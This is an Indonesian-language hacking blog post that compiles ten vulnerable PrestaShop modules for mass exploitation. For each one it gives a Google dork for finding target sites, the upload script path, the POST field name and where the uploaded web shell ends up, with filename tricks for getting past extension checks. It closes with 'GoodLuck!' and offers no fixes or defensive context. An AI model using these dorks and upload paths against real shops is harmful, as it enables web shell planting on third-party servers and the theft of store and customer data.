10 Modules Prestashop Vuln Arbitrary File Upload
Rabu, 23 Oktober 2019
Tulis Komentar
Adm0n - 10 Modules Prestashop Vuln Arbitrary File Upload. jalan jalan ke packetstrom eh ketemu 10 moduls yang vuln arbitraty file upload yaudah mimin rangkum jadi 1 terus post kesini. let's go!
1. columnadverts
Dork: inurl:/modules/columnadverts/ or inurl:/modules/columnadverts2/
exploit: https://site.com/modules/columnadverts/uploadimage.php
Postdata: userfile
Shell location: /modules/columnadverts/slides/shell.php
bypass: shell.PhP.jpg or shell.php5 use your brain.
2. homepageadvertise
dork: inurl:/modules/homepageadvertise/ or inurl:/modules/homepageadvertise2
exploit: /modules/homepageadvertise/uploadimage.php
ex: https://site.com//modules/homepageadvertise/uploadimage.php
Postdata: userfile
shell location: https://site.com/modules/homepageadvertise/slides/shell.php
3. productpageadverts
dork: inurl:/modules/productpageadverts2 or inurl:/modules/productpageadverts
exploit: /modules/productpageadverts/uploadimage.php
Postdata: userfile
shell location: https://site.com/modules/productpageadverts/slides/Shell.php
4. simpleslideshow
Dork: inurl:/modules/simpleslideshow/
exploit: /modules/simpleslideshow/uploadimage.php
Postdata: userfile
shell location: site.com//modules/simpleslideshow/slides/Shell.php
5. vtemslideshow
Dork: inurl:/modules/vtemslideshow/
exploit: /modules/vtemslideshow/uploadimage.php
Postdata: userfile
shell location: /modules/vtemslideshow/slides/Shell.php
6. realty
Dork: inurl:/modules/realty/include/
exploit: /modules/realty/include/uploadimage.php
Postdata: userfile
shell location: /modules/realty/include/slides/Shell.php
7. realty evogallery
Dork: inurl:/modules/realty/evogallery2 OR inurl:/modules/realty/evogallery/
exploit: /modules/realty/evogallery2/uploadimage.php
Postdata: userfile
shell location: /modules/realty/evogallery2/slides/Shell.php
8. nvn_export_orders
Dork: inurl: /modules/nvn_export_orders
exploit: /modules/nvn_export_orders/upload.php
Postdata: images[]
Bypass shell: Shell.PhP.jpeg, Shell.Jpg.xxx, Shell.PhP5.gif, Shell.Phtml so many!
shell location: /modules/nvn_export_orders/Shell.php5.gif
9. pk_vertflexmenu
Dork: inurl:/modules/pk_vertflexmenu/
exploit: /modules/pk_vertflexmenu/ajax/upload.php
Postdata: images[]
Bypass shell: Shell.PhP.jpeg, Shell.Jpg.xxx, Shell.PhP5.gif, Shell.Phtml so many!
shell location: /modules/pk_vertflexmenu/uploads/Shell.PhP
10. orderfiles
Dork: /modules/orderfiles/
exploit: /modules/orderfiles/ajax/upload.php
Postdata: images[]
Bypass shell: Shell.PhP.jpeg, Shell.Jpg.xxx, Shell.PhP5.gif, Shell.Phtml so many!
Shell location: /modules/orderfiles/files/Shell.PhP
GoodLuck! #~NelsHere
Belum ada Komentar untuk "10 Modules Prestashop Vuln Arbitrary File Upload "
Posting Komentar